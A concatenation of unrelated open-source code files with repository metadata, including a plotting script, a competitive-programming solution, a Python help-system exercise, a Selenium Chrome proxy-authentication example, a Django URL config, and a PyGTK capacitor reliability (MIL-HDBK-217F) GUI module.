        #ax[1].legend()
        ax[1].grid(True)
        ax[1].set_xlabel("Time ($\mu$s)")
        ax[1].set_ylabel("Input voltage $v_{in}$ (V)")

    fig_name = f"RLC_IO_{dataset_type}_{model_type}.pdf"
    fig.savefig(os.path.join("fig", fig_name), bbox_inches='tight')

    # Goodness of fit of the simulation against the noise-free signal.
    R_sq = metrics.r_square(y_val, y_val_sim)
    print(f"R-squared metrics: {R_sq}")
7de38a9ebf121bd2358964fca2221e14ee60c24a
b93446177b6ac10bd27582b1e9647f0adab7d3d4
/pyVoodoo/ir.py
af3c8d637b9a9ac7f6a12bde7d1fe86473914bc8
[ "BSD-3-Clause" ]
permissive
bossiernesto/pyVoodoo
727f2666a656e8af7ed3d2c8ee4a2ea51f7b95f0
7be339ce05c909d0c3c2893ab1eaa2d18f335235
refs/heads/master
2021-04-09T17:16:46.984893
2017-01-31T22:11:29
2017-01-31T22:11:29
34,115,994
1
1
null
null
null
null
UTF-8
Python
false
false
67
py
class Node(tuple): """Base class for AST""" __slots__ = []
2ad5195cb2531f382db1acaca896c6c212992811
e63c1e59b2d1bfb5c03d7bf9178cf3b8302ce551
/uri/uri_python/ad_hoc/p1089.py
5016209f1dd88333f5f3c73bdab477d7dc2336d9
[]
no_license
GabrielEstevam/icpc_contest_training
b8d97184ace8a0e13e1c0bf442baa36c853a6837
012796c2ceb901cf7aa25d44a93614696a7d9c58
refs/heads/master
2020-04-24T06:15:16.826669
2019-10-08T23:13:15
2019-10-08T23:13:15
171,758,893
5
0
null
null
null
null
UTF-8
Python
false
false
366
py
N = int(input()) while N != 0: entry = input().split(" ") picos = 0 aux_a = int(entry[N-2]) aux_b = int(entry[N-1]) for i in range(N): if (aux_b < aux_a and aux_b < int(entry[i])) or (aux_b > aux_a and aux_b > int(entry[i])): picos += 1 aux_a = aux_b aux_b = int(entry[i]) print(picos) N = int(input())
1df8e317fea69f008dc5d5e32315bd51aa0fb43c
5896da906bdcb1315881712a0baa52a706bbeb06
/cursoemvideo/Atividades/exercicios/ex106.py
3ebfa0d823d84edaa4ae159d58714aa44738c3d8
[]
no_license
frederico-prog/python
313b4c11347fb33f67d73dee89f3106f483a2333
6c3d3757944fcbf569e1114838f236a9329358bd
refs/heads/master
2022-12-13T23:26:55.112797
2020-08-21T22:03:26
2020-08-21T22:03:26
272,381,728
3
0
null
null
null
null
UTF-8
Python
false
false
1,125
py
''' FAÇA UM MINI-SISTEMA QUE UTILIZE O INTERECTIVE HELP DO PYTHON. O USUÁRIO VAI DIGITAR O COMANDO E O MANUAL VAI APARECER. QUANDO O USUÁRIO DIGITAR A PALAVRA 'FIM', O PROGRAMA SE ENCERRARÁ. OBS.: USE CORES. ''' from time import sleep c = ( '\033[m', # 0- sem cor '\033[0;30;41m', # 1- cor vermelha '\033[0;30;42m', # 2- cor verde '\033[0;30;43m', # 3- cor amarela '\033[0;30;44m', # 4- cor azul '\033[0;30;45m', # 5- cor roxa '\033[7;30m' # 6- branca ); def ajuda(com): titulo(f'Acessando o manual do comando \'{com}\'', 4) print(c[6], end='') help(comando) print(c[0], end='') sleep(2) def titulo(msg, cor=0): tam = len(msg) + 4 print(c[cor], end='') print('~' * tam) print(f' {msg}') print('~' * tam) print(c[0], end='') sleep(1) # PROGRAMA PRINCIPAL comando = '' while True: titulo('SISTEMA DE AJUDA PyHELP', 2) comando = str(input('Função ou Biblioteca > ')) if comando.upper() == 'FIM': break else: ajuda(comando) print('ATÉ LOGO!', 1)
7a18d7edc350a9159863008804955748ffbeec6f
e262e64415335060868e9f7f73ab8701e3be2f7b
/.history/Test002/数据类型_20201205162718.py
6bec763ca9a2bf6df3696d9f6db0124f17054d85
[]
no_license
Allison001/developer_test
6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63
b8e04b4b248b0c10a35e93128a5323165990052c
refs/heads/master
2023-06-18T08:46:40.202383
2021-07-23T03:31:54
2021-07-23T03:31:54
322,807,303
0
0
null
null
null
null
UTF-8
Python
false
false
208
py
fruits = ['orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana'] # print(fruits.count("apple")) # a = fruits.index("banana",4) # print(a) # fruits.reverse() # print(fruits) fruits.append("daka")
2fd4937da743fc000cbedc14f31385020e365cac
c264153f9188d3af187905d846fa20296a0af85d
/Python/Python3网络爬虫开发实战/《Python3网络爬虫开发实战》随书源代码/proxy/selenium_chrome_auth.py
f9b9e55510c5325125459414bee6a67c7eb3fbed
[]
no_license
IS-OSCAR-YU/ebooks
5cd3c1089a221759793524df647e231a582b19ba
b125204c4fe69b9ca9ff774c7bc166d3cb2a875b
refs/heads/master
2023-05-23T02:46:58.718636
2021-06-16T12:15:13
2021-06-16T12:15:13
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,653
py
from selenium import webdriver from selenium.webdriver.chrome.options import Options import zipfile ip = '127.0.0.1' port = 9743 username = 'foo' password = 'bar' manifest_json = """ { "version": "1.0.0", "manifest_version": 2, "name": "Chrome Proxy", "permissions": [ "proxy", "tabs", "unlimitedStorage", "storage", "<all_urls>", "webRequest", "webRequestBlocking" ], "background": { "scripts": ["background.js"] } } """ background_js = """ var config = { mode: "fixed_servers", rules: { singleProxy: { scheme: "http", host: "%(ip)s", port: %(port)s } } } chrome.proxy.settings.set({value: config, scope: "regular"}, function() {}); function callbackFn(details) { return { authCredentials: { username: "%(username)s", password: "%(password)s" } } } chrome.webRequest.onAuthRequired.addListener( callbackFn, {urls: ["<all_urls>"]}, ['blocking'] ) """ % {'ip': ip, 'port': port, 'username': username, 'password': password} plugin_file = 'proxy_auth_plugin.zip' with zipfile.ZipFile(plugin_file, 'w') as zp: zp.writestr("manifest.json", manifest_json) zp.writestr("background.js", background_js) chrome_options = Options() chrome_options.add_argument("--start-maximized") chrome_options.add_extension(plugin_file) browser = webdriver.Chrome(chrome_options=chrome_options) browser.get('http://httpbin.org/get')
ecf74664f5363c52e4790b600cfe87442802733c
76efd7bde15c764d81b847c2f1d27776e90ec2ed
/imgauth/urls.py
9e3bcaf4c6a05bdd033ed6d3d6fdce1b5c3a4914
[]
no_license
ccsreenidhin/Image-Metadata-Analysis-ELA
e7e961f5d5724397081c9437c78e727577f449fe
4bb24c3047dc59a81867c7c9cdb58bc0fc222358
refs/heads/master
2022-11-07T21:18:51.340625
2018-03-23T17:16:27
2020-06-13T08:02:49
271,966,669
0
0
null
null
null
null
UTF-8
Python
false
false
1,033
py
"""imgauth URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.11/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url, include from django.contrib import admin from django.conf import settings from django.conf.urls.static import static urlpatterns = [ url(r'^admin/', admin.site.urls), #url(r'^', include('imgaut.urls')), ]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
221f6766e94a926edbc76bf1e3da59c333ccd8f6
42631b33be63821744ec85caf6ef49a6b1d189b0
/VSRTorch/Models/video/__init__.py
f1c5cfea0869dbccaa6f876c2c5d088f6f37712f
[ "MIT" ]
permissive
AliceMegatron/VideoSuperResolution
c70e822764b29a01f3a7c035cfc10e3b31b9f6f4
bfcf237ee7e412b688c7f5e094585bbaecffc1d0
refs/heads/master
2020-05-29T15:25:13.840222
2019-05-16T13:00:43
2019-05-16T13:00:43
189,219,950
1
0
MIT
2019-05-29T12:21:53
2019-05-29T12:21:52
null
UTF-8
Python
false
false
240
py
# Copyright (c): Wenyi Tang 2017-2019. # Author: Wenyi Tang # Email: [email protected] # Update Date: 2019/4/3 下午5:10 import logging _logger = logging.getLogger("VSR.VIDEO") _logger.info("@LoSealL. Video related ops, nets...")
101ccd2aec21b66c706af7a581d6bb1035636092
abb614790bdf41c7db9d09dfdea4385f78c2be52
/rtk-RQA/rtk/hardware/__gui/gtk/Capacitor.py
936eb677804a46719f2a7e3d331f370599b11797
[ "BSD-3-Clause" ]
permissive
codacy-badger/rtk
f981bb75aadef6aaeb5a6fa427d0a3a158626a2a
bdb9392164b0b32b0da53f8632cbe6e3be808b12
refs/heads/master
2020-03-19T02:46:10.320241
2017-10-26T20:08:12
2017-10-26T20:08:12
135,659,105
0
0
null
2018-06-01T02:43:23
2018-06-01T02:43:23
null
UTF-8
Python
false
false
39,030
py
#!/usr/bin/env python """ ################################################### Capacitor Package Component Specific Work Book View ################################################### """ # -*- coding: utf-8 -*- # # rtk.hardware.__gui.gtk.Capacitor.py is part of The RTK Project # # All rights reserved. import sys # Import modules for localization support. import gettext import locale # Modules required for the GUI. try: import pygtk pygtk.require('2.0') except ImportError: sys.exit(1) try: import gtk except ImportError: sys.exit(1) try: import gtk.glade except ImportError: sys.exit(1) # Modules required for plotting. import matplotlib # pylint: disable=E0401 from matplotlib.backends.backend_gtk import FigureCanvasGTK as FigureCanvas # pylint: disable=E0401 from matplotlib.figure import Figure # pylint: disable=E0401 # Import other RTK modules. try: import Configuration import gui.gtk.Widgets as Widgets except ImportError: import rtk.Configuration as Configuration import rtk.gui.gtk.Widgets as Widgets __author__ = 'Andrew Rowland' __email__ = '[email protected]' __organization__ = 'ReliaQual Associates, LLC' __copyright__ = 'Copyright 2007 - 2015 Andrew "weibullguy" Rowland' try: locale.setlocale(locale.LC_ALL, Configuration.LOCALE) except locale.Error: locale.setlocale(locale.LC_ALL, '') _ = gettext.gettext matplotlib.use('GTK') class Inputs(gtk.Frame): """ The Work Book view for displaying all the attributes for a capacitor. 
The attributes of a capacitor Work Book view are: """ dicQuality = {40: ["", "MIL-SPEC", _(u"Lower")], 41: ["", "M", _(u"Non-Established Reliability"), _(u"Lower")], 42: ["", "S", "R", "P", "M", "L", _(u"MIL-C-19978, Non-Established Reliability"), _(u"Lower")], 43: ["", "S", "R", "P", "M", "L", _(u"MIL-C-18312, Non-Established Reliability"), _(u"Lower")], 44: ["", "S", "R", "P", "M", _(u"Lower")], 45: ["", "S", "R", "P", "M", _(u"Lower")], 46: ["", "T", "S", "R", "P", "M", "L", _(u"MIL-C-5, Non-Established Reliability, Dipped"), _(u"MIL-C-5, Non-Established Reliability, Molded"), _(u"Lower")], 47: ["", "MIL-C-10950", _(u"Lower")], 48: ["", "S", "R", "P", "M", "L", _(u"MIL-C-11272, Non-Established Reliability"), _(u"Lower")], 49: ["", "S", "R", "P", "M", "L", _(u"MIL-C-11015, Non-Established Reliability"), _(u"Lower")], 50: ["", "S", "R", "P", "M", _(u"Non-Established Reliability"), _(u"Lower")], 51: ["", "D", "C", "S", "B", "R", "P", "M", "L", _(u"Lower")], 52: ["", "S", "R", "P", "M", "L", _(u"MIL-C-3965, Non-Established Reliability"), _(u"Lower")], 53: ["", "S", "R", "P", "M", _(u"Non-Established Reliability"), _(u"Lower")], 54: ["", "MIL-SPEC", _(u"Lower")], 55: ["", "MIL-SPEC", _(u"Lower")], 56: ["", "MIL-SPEC", _(u"Lower")], 57: ["", "MIL-SPEC", _(u"Lower")], 58: ["", "MIL-SPEC", _(u"Lower")]} dicSpecification = {40: ["", "MIL-C-25 (CP)", "MIL-C-12889 (CA)"], 41: ["", "MIL-C-11693 (CZ/CZR)"], 42: ["", "MIL-C-14157 (CPV)", "MIL-C-19978 (CQ/CQR)"], 43: ["", "MIL-C-18312 (CH)", "MIL-C-39022 (CHR)"], 44: ["", "MIL-C-55514 (CFR)"], 45: ["", "MIL-C-83421 (CRH)"], 46: ["", "MIL-C-5 (CM)", "MIL-C-39001 (CMR)"], 47: ["", "MIL-C-10950 (CB)"], 48: ["", "MIL-C-11272 (CY)", "MIL-C-23269 (CYR)"], 49: ["", "MIL-C-11015 (CK)", "MIL-C-39014 (CKR)"], 50: ["", "MIL-C-20 (CC/CCR)", "MIL-C-55681 (CDR)"], 51: ["", "MIL-C-39003 (CSR)"], 52: ["", "MIL-C-3965 (CL)", "MIL-C-39003 (CLR)"], 53: ["", "MIL-C-39016 (CU and CUR)"], 54: ["", "MIL-C-62 (CE)"], 55: ["", "MIL-C-81 (CV)"], 56: 
["", "MIL-C-14409 (PC)"], 57: ["", "MIL-C-92 (CT)"], 58: ["", "MIL-C-23183 (CG)"]} dicSpecSheet = {40: [["", u"85\u00B0C", u"125\u00B0C"], ["", u"85\u00B0C"]], 41: [["", u"85\u00B0C", u"125\u00B0C", u"150\u00B0C"]], 42: [["", u"65\u00B0C", u"85\u00B0C", u"125\u00B0C"], ["", u"65\u00B0C", u"85\u00B0C", u"125\u00B0C", u"170\u00B0C"]], 43: [["", u"85\u00B0C", u"125\u00B0C"], ["", u"85\u00B0C", u"125\u00B0C"]], 44: [["", u"85\u00B0C", u"125\u00B0C"]], 45: [["", u"125\u00B0C"]], 46: [["", u"70\u00B0C", u"85\u00B0C", u"125\u00B0C", u"150\u00B0C"], ["", u"125\u00B0C", u"150\u00B0C"]], 47: [["", u"85\u00B0C", u"150\u00B0C"]], 48: [["", u"125\u00B0C", u"200\u00B0C"], ["", u"125\u00B0C"]], 49: [["", u"85\u00B0C", u"125\u00B0C", u"150\u00B0C"], ["", u"85\u00B0C", u"125\u00B0C"]], 50: [["", u"85\u00B0C", u"125\u00B0C"], ["", u"85\u00B0C"]], 51: [["", _(u"All")]], 52: [["", u"85\u00B0C", u"125\u00B0C", u"175\u00B0C"], ["", u"125\u00B0C"]], 53: [["", u"85\u00B0C", u"105\u00B0C", u"125\u00B0C"]], 54: [["", u"85\u00B0C"]], 55: [["", u"85\u00B0C", u"125\u00B0C"]], 56: [["", u"125\u00B0C", u"150\u00B0C"]], 57: [["", u"85\u00B0C"]], 58: [["", u"85\u00B0C", u"100\u00B0C", u"125\u00B0C"]]} def __init__(self, model): """ Method to create an input frame for the Capacitor data model. :param model: the :py:class:`rtk.hardware.component.capacitor.Capacitor.Model` whose attributes will be displayed. """ gtk.Frame.__init__(self) self.set_shadow_type(gtk.SHADOW_ETCHED_OUT) # Define private dictionary attributes. # Define private list attributes. # Derating points for the derating curve. The list at position 0 is # for severe environments. The list at position 1 is for benign # environments. 
self._lst_derate_criteria = [[0.6, 0.6, 0.0], [0.9, 0.9, 0.0]] self._lst_count_labels = [_(u"Quality:"), _(u"Specification:")] self._lst_stress_labels = [_(u"Quality:"), _(u"\u03C0<sub>Q</sub> Override:"), _(u"Rated Voltage:"), _(u"Applied DC Voltage:"), _(u"Applied AC Voltage:"), _(u"Capacitance (F):"), _(u"Specification:"), _(u"Temperature Rating:")] self._lst_quality = self.dicQuality[model.subcategory] self._lst_specification = self.dicSpecification[model.subcategory] self._lst_specsheet = self.dicSpecSheet[model.subcategory] self._lst_construction = [] self._lst_handler_id = [] # Define private scalar attributes. self._hardware_model = model self._subcategory = model.subcategory # Define public dictionary attributes. # Define public list attributes. # Define public scalar attributes. self.cmbConfiguration = Widgets.make_combo(simple=True) self.cmbConstruction = Widgets.make_combo(simple=True) self.cmbQuality = Widgets.make_combo(simple=True) self.cmbSpecification = Widgets.make_combo(simple=True) self.cmbSpecSheet = Widgets.make_combo(simple=True) self.txtACVoltApplied = Widgets.make_entry(width=100) self.txtCapacitance = Widgets.make_entry(width=100) self.txtCommercialPiQ = Widgets.make_entry(width=100) self.txtEffResistance = Widgets.make_entry(width=100) self.txtVoltRated = Widgets.make_entry(width=100) self.txtVoltApplied = Widgets.make_entry(width=100) # Subcategory specific attributes. if self._subcategory == 51: # Solid tantalum self._lst_stress_labels.append(_(u"Eff. Series Resistance:")) elif self._subcategory == 52: # Non-solid tantalum self._lst_construction = ["", _(u"Slug, All Tantalum"), _(u"Foil, Hermetic"), _(u"Slug, Hermetic"), _(u"Foil, Non-Hermetic"), _(u"Slug, Non-Hermetic")] self._lst_stress_labels.append(_(u"Construction:")) elif self._subcategory == 58: # Variable vacuum self._lst_configuration = ["", _(u"Fixed"), _(u"Variable")] self._lst_stress_labels.append(_(u"Configuration:")) # Create the tooltips for all the input widgets. 
self.cmbConfiguration.set_tooltip_text(_(u"Displays whether the " u"selected capacitor is " u"fixed or variable.")) self.cmbConstruction.set_tooltip_text(_(u"Displays the method of " u"construction for the " u"selected capacitor.")) self.cmbQuality.set_tooltip_text(_(u"Select and display the quality " u"level for the selected " u"capacitor.")) self.cmbSpecification.set_tooltip_text(_(u"Selects the governing " u"specification for the " u"selected capacitor.")) self.cmbSpecSheet.set_tooltip_text(_(u"Selects the maximum " u"temperature rating for the " u"selected capacitor.")) self.txtACVoltApplied.set_tooltip_text(_(u"Displays the peak " u"operating AC voltage for " u"the selected capacitor.")) self.txtCapacitance.set_tooltip_text(_(u"Display the capacitance in " u"farads for the selected " u"capacitor.")) self.txtCommercialPiQ.set_tooltip_text(_(u"Displays the user-defined " u"quality factor for the " u"selected capacitor. This " u"value over rides the " u"quality factor selected " u"above.")) self.txtEffResistance.set_tooltip_text(_(u"Displays the effective " u"series resistance between " u"the power supply and the " u"capacitor.")) self.txtVoltRated.set_tooltip_text(_(u"Displays the rated voltage for " u"the selected capacitor.")) self.txtVoltApplied.set_tooltip_text(_(u"Display the operating DC " u"voltage for the selected " u"capacitor.")) # Connect signals to callback functions. 
self._lst_handler_id.append( self.cmbQuality.connect('changed', self._on_combo_changed, 0)) self._lst_handler_id.append( self.txtCommercialPiQ.connect('focus-out-event', self._on_focus_out, 1)) self._lst_handler_id.append( self.txtVoltRated.connect('focus-out-event', self._on_focus_out, 2)) self._lst_handler_id.append( self.txtVoltApplied.connect('focus-out-event', self._on_focus_out, 3)) self._lst_handler_id.append( self.txtACVoltApplied.connect('focus-out-event', self._on_focus_out, 4)) self._lst_handler_id.append( self.txtCapacitance.connect('focus-out-event', self._on_focus_out, 5)) self._lst_handler_id.append( self.cmbSpecification.connect('changed', self._on_combo_changed, 6)) self._lst_handler_id.append( self.cmbSpecSheet.connect('changed', self._on_combo_changed, 7)) self._lst_handler_id.append( self.txtEffResistance.connect('focus-out-event', self._on_focus_out, 8)) self._lst_handler_id.append( self.cmbConstruction.connect('changed', self._on_combo_changed, 9)) self._lst_handler_id.append( self.cmbConfiguration.connect('changed', self._on_combo_changed, 10)) def create_217_count_inputs(self, x_pos=5): """ Method to create the MIL-HDBK-217FN2 parts count input widgets for Capacitors. :keyword int x_pos: the x position of the display widgets. :return: False if successful or True if an error is encountered. :rtype: bool """ _label = gtk.Label() _label.set_markup("<span weight='bold'>" + _(u"MIL-HDBK-217FN2 Parts Count Inputs") + "</span>") _label.set_justify(gtk.JUSTIFY_LEFT) _label.set_alignment(xalign=0.5, yalign=0.5) _label.show_all() self.set_label_widget(_label) _fixed = gtk.Fixed() _scrollwindow = gtk.ScrolledWindow() _scrollwindow.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC) _scrollwindow.add_with_viewport(_fixed) self.add(_scrollwindow) # Populate all the gtk.ComboBox(). 
for i in range(len(self._lst_quality)): self.cmbQuality.insert_text(i, self._lst_quality[i]) for i in range(len(self._lst_specification)): self.cmbSpecification.insert_text(i, self._lst_specification[i]) # Create and place all the labels for the inputs. (_x_pos, _y_pos) = Widgets.make_labels(self._lst_count_labels, _fixed, 5, 5) _x_pos = max(x_pos, _x_pos) + 50 # Place all the input widgets. if self.cmbQuality.get_parent() is not None: self.cmbQuality.reparent(_fixed) if self.cmbSpecification.get_parent() is not None: self.cmbSpecification.reparent(_fixed) _fixed.put(self.cmbQuality, _x_pos, _y_pos[0]) _fixed.put(self.cmbSpecification, _x_pos, _y_pos[1]) _fixed.show_all() return _x_pos def create_217_stress_inputs(self, x_pos=5): """ Method to create the MIL-HDBK-217FN2 part stress input widgets for Capacitors. :keyword int x_pos: the x position of the display widgets. :return: False if successful or True if an error is encountered. :rtype: bool """ _label = gtk.Label() _label.set_markup("<span weight='bold'>" + _(u"MIL-HDBK-217FN2 Part Stress Inputs") + "</span>") _label.set_justify(gtk.JUSTIFY_LEFT) _label.set_alignment(xalign=0.5, yalign=0.5) _label.show_all() self.set_label_widget(_label) _fixed = gtk.Fixed() _scrollwindow = gtk.ScrolledWindow() _scrollwindow.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC) _scrollwindow.add_with_viewport(_fixed) self.add(_scrollwindow) # Populate all the gtk.ComboBox(). for i in range(len(self._lst_quality)): self.cmbQuality.insert_text(i, self._lst_quality[i]) for i in range(len(self._lst_specification)): self.cmbSpecification.insert_text(i, self._lst_specification[i]) # Create and place all the labels for the inputs. (_x_pos, _y_pos) = Widgets.make_labels(self._lst_stress_labels, _fixed, 5, 5) _x_pos = max(x_pos, _x_pos) + 50 # Place all the input widgets. 
if self.cmbQuality.get_parent is not None: self.cmbQuality.reparent(_fixed) if self.cmbSpecification.get_parent is not None: self.cmbSpecification.reparent(_fixed) _fixed.put(self.cmbQuality, _x_pos, _y_pos[0]) _fixed.put(self.txtCommercialPiQ, _x_pos, _y_pos[1]) _fixed.put(self.txtVoltRated, _x_pos, _y_pos[2]) _fixed.put(self.txtVoltApplied, _x_pos, _y_pos[3]) _fixed.put(self.txtACVoltApplied, _x_pos, _y_pos[4]) _fixed.put(self.txtCapacitance, _x_pos, _y_pos[5]) _fixed.put(self.cmbSpecification, _x_pos, _y_pos[6]) _fixed.put(self.cmbSpecSheet, _x_pos, _y_pos[7]) if self._subcategory == 51: # Solid tantalum _fixed.put(self.txtEffResistance, _x_pos, _y_pos[8]) elif self._subcategory == 52: # Non-solid tantalum for i in range(len(self._lst_construction)): self.cmbConstruction.insert_text(i, self._lst_construction[i]) _fixed.put(self.cmbConstruction, _x_pos, _y_pos[8]) elif self._subcategory == 58: # Gas or vacuum for i in range(len(self._lst_configuration)): self.cmbConfiguration.insert_text(i, self._lst_configuration[i]) _fixed.put(self.cmbConfiguration, _x_pos, _y_pos[8]) _fixed.show_all() return _x_pos def load_217_count_inputs(self, model): """ Method to load the Capacitor class gtk.Widgets() with MIL-HDBK-217FN2 parts count calculation inputs. :param model: the :py:class:`rtk.hardware.component.capacitor.Capacitor.Model` to load the attributes from. :return: False if successful or True if an error is encountered. :rtype: bool """ self.cmbQuality.set_active(int(model.quality)) self.cmbSpecification.set_active(int(model.specification)) return False def load_217_stress_inputs(self, model): """ Method to load the Capacitor class gtk.Widgets() with MIL-HDBK-217FN2 part stress calculation inputs. :param model: the :py:class:`rtk.hardware.component.capacitor.Capacitor.Model` to load the attributes from. :return: False if successful or True if an error is encountered. :rtype: bool """ fmt = '{0:0.' 
+ str(Configuration.PLACES) + 'G}' self.cmbQuality.set_active(int(model.quality)) self.txtCommercialPiQ.set_text(str(fmt.format(model.q_override))) self.txtVoltRated.set_text(str(fmt.format(model.rated_voltage))) self.txtVoltApplied.set_text(str(fmt.format(model.operating_voltage))) self.txtACVoltApplied.set_text(str(fmt.format(model.acvapplied))) self.txtCapacitance.set_text(str('{0:0.8G}'.format(model.capacitance))) # Load subcategory specific widgets. if self._subcategory in [40, 41, 42, 43, 46, 47, 48, 49, 50, 52, 53, 54, 55, 56, 57, 58]: self.cmbSpecification.set_active(int(model.specification)) if self._subcategory in [40, 41, 42, 43, 44, 46, 47, 48, 49, 50, 52, 53, 54, 55, 56, 57, 58]: self.cmbSpecSheet.set_active(int(model.spec_sheet)) if self._subcategory == 51: self.txtEffResistance.set_text( str(fmt.format(model.effective_resistance))) if self._subcategory == 52: self.cmbConstruction.set_active(int(model.construction)) if self._subcategory == 58: self.cmbConfiguration.set_active(int(model.configuration)) return False def _on_combo_changed(self, combo, index): """ Method to respond to gtk.ComboBox() changed signals and calls the correct function or method, passing any parameters as needed. :param gtk.ComboBox combo: the gtk.ComboBox() that called this method. :param int index: the index in the handler ID list oc the callback signal associated with the gtk.ComboBox() that called this method. :return: False if successful or True is an error is encountered. 
:rtype: bool """ combo.handler_block(self._lst_handler_id[index]) if index == 0: self._hardware_model.quality = combo.get_active() elif index == 6: self._hardware_model.specification = combo.get_active() self._load_spec_sheet(self._hardware_model.specification - 1) elif index == 7: self._hardware_model.spec_sheet = combo.get_active() try: self._hardware_model.reference_temperature = \ self._hardware_model.lst_ref_temp[combo.get_active() - 1] except IndexError: print self._hardware_model.name, self._hardware_model.lst_ref_temp elif index == 9: self._hardware_model.construction = combo.get_active() elif index == 10: self._hardware_model.configuration = combo.get_active() combo.handler_unblock(self._lst_handler_id[index]) return False def _on_focus_out(self, entry, __event, index): """ Method to respond to gtk.Entry() focus_out signals and calls the correct function or method, passing any parameters as needed. :param gtk.Entry entry: the gtk.Entry() that called this method. :param gtk.gdk.Event __event: the gtk.gdk.Event() that called this method. :param int index: the index in the handler ID list of the callback signal associated with the gtk.Entry() that called this method. :return: False if successful or True is an error is encountered. :rtype: bool """ entry.handler_block(self._lst_handler_id[index]) if index == 1: self._hardware_model.q_override = float(entry.get_text()) elif index == 2: self._hardware_model.rated_voltage = float(entry.get_text()) elif index == 3: self._hardware_model.operating_voltage = float(entry.get_text()) elif index == 4: self._hardware_model.acvapplied = float(entry.get_text()) elif index == 5: self._hardware_model.capacitance = float(entry.get_text()) elif index == 8: self._hardware_model.effective_resistance = float(entry.get_text()) entry.handler_unblock(self._lst_handler_id[index]) return False def _load_spec_sheet(self, specification): """ Method to load the specification sheet gtk.ComboBox() whenever a new specification is selected. 
:param int specification: the selected specification index. :return: False if successful or True if an error is encountered. :rtype: bool """ # Remove existing entries. _model = self.cmbSpecSheet.get_model() _model.clear() # Load the new entries. _n_spec_sheets = len(self._lst_specsheet[specification]) for i in range(_n_spec_sheets): self.cmbSpecSheet.insert_text( i, self._lst_specsheet[specification][i]) return False class Results(gtk.Frame): """ The Work Book view for displaying all the output attributes for a capacitor. The output attributes of a capacitor Work Book view are: """ def __init__(self, model): """ Method to initialize an instance of the Capacitor assessment results view. :param int subcategory: the Capacitor subcategory ID of the component to create the view for. :return: False if successful or True if an error is encountered. :rtype: bool """ gtk.Frame.__init__(self) # Define private dictionary attributes. # Define private list attributes. self._lst_count_labels = [u"<span foreground=\"blue\">\u03BB<sub>EQUIP</sub> = \u03BB<sub>g</sub>\u03C0<sub>Q</sub></span>", u"\u03BB<sub>g</sub>:", u"\u03C0<sub>Q</sub>:"] self._lst_stress_labels = ['', u"\u03BB<sub>b</sub>:", u"\u03C0<sub>Q</sub>:", u"\u03C0<sub>E</sub>:", u"\u03C0<sub>CV</sub>:"] # Define private scalar attributes. self._hardware_model = model self._subcategory = model.subcategory # Define public dictionary attributes. # Define public list attributes. # Define public scalar attributes. 
self.txtLambdaB = Widgets.make_entry(width=100, editable=False, bold=True) self.txtPiQ = Widgets.make_entry(width=100, editable=False, bold=True) self.txtPiE = Widgets.make_entry(width=100, editable=False, bold=True) self.txtPiCV = Widgets.make_entry(width=100, editable=False, bold=True) self.txtPiSR = Widgets.make_entry(width=100, editable=False, bold=True) self.txtPiC = Widgets.make_entry(width=100, editable=False, bold=True) self.txtPiCF = Widgets.make_entry(width=100, editable=False, bold=True) self.figDerate = Figure(figsize=(6, 4)) self.axsDerate = self.figDerate.add_subplot(111) self.pltDerate = FigureCanvas(self.figDerate) # Subcategory specific attributes. if self._subcategory in [40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 53, 54]: self._lst_stress_labels[0] = u"<span foreground=\"blue\">\u03BB<sub>p</sub> = \u03BB<sub>b</sub>\u03C0<sub>Q</sub>\u03C0<sub>E</sub>\u03C0<sub>CV</sub></span>" elif self._subcategory == 51: # Solid tantalum self._lst_stress_labels[0] = u"<span foreground=\"blue\">\u03BB<sub>p</sub> = \u03BB<sub>b</sub>\u03C0<sub>Q</sub>\u03C0<sub>E</sub>\u03C0<sub>CV</sub>\u03C0<sub>SR</sub></span>" self._lst_stress_labels.append(u"\u03C0<sub>SR</sub>:") elif self._subcategory == 52: # Non-solid tantalum self._lst_stress_labels[0] = u"<span foreground=\"blue\">\u03BB<sub>p</sub> = \u03BB<sub>b</sub>\u03C0<sub>Q</sub>\u03C0<sub>E</sub>\u03C0<sub>CV</sub>\u03C0<sub>C</sub></span>" self._lst_stress_labels.append(u"\u03C0<sub>C</sub>:") elif self._subcategory in [55, 56, 57]: self._lst_stress_labels[0] = u"<span foreground=\"blue\">\u03BB<sub>p</sub> = \u03BB<sub>b</sub>\u03C0<sub>Q</sub>\u03C0<sub>E</sub></span>" self._lst_stress_labels.pop(4) elif self._subcategory == 58: self._lst_stress_labels[0] = u"<span foreground=\"blue\">\u03BB<sub>p</sub> = \u03BB<sub>b</sub>\u03C0<sub>Q</sub>\u03C0<sub>E</sub>\u03C0<sub>CF</sub></span>" self._lst_stress_labels[4] = u"\u03C0<sub>CF</sub>:" # Create the tooltips for all the results widgets. 
self.txtPiQ.set_tooltip_text(_(u"Displays the quality factor for the " u"selected capacitor.")) self.txtPiQ.set_tooltip_text(_(u"Displays the quality factor for the " u"selected capacitor.")) self.txtPiE.set_tooltip_text(_(u"Displays the environement factor for " u"the selected capacitor.")) self.txtPiCV.set_tooltip_text(_(u"Displays the capacitance correction " u"factor for the selected capacitor.")) self.txtPiSR.set_tooltip_text(_(u"Displays the effective series " u"resistance factor for the selected " u"capacitor.")) self.txtPiC.set_tooltip_text(_(u"Displays the construction factor " u"for the selected capacitor.")) self.txtPiCF.set_tooltip_text(_(u"Displays the configuration factor " u"for the selected capacitor.")) def create_217_count_results(self, x_pos=5): """ Method to create the MIL-HDBK-217FN2 parts count result widgets for Capacitors. :keyword int x_pos: the x position of the display widgets. :return: _x_pos: the x-coordinate of the widgets. :rtype: int """ _label = gtk.Label() _label.set_markup("<span weight='bold'>" + _(u"MIL-HDBK-217FN2 Parts Count Results") + 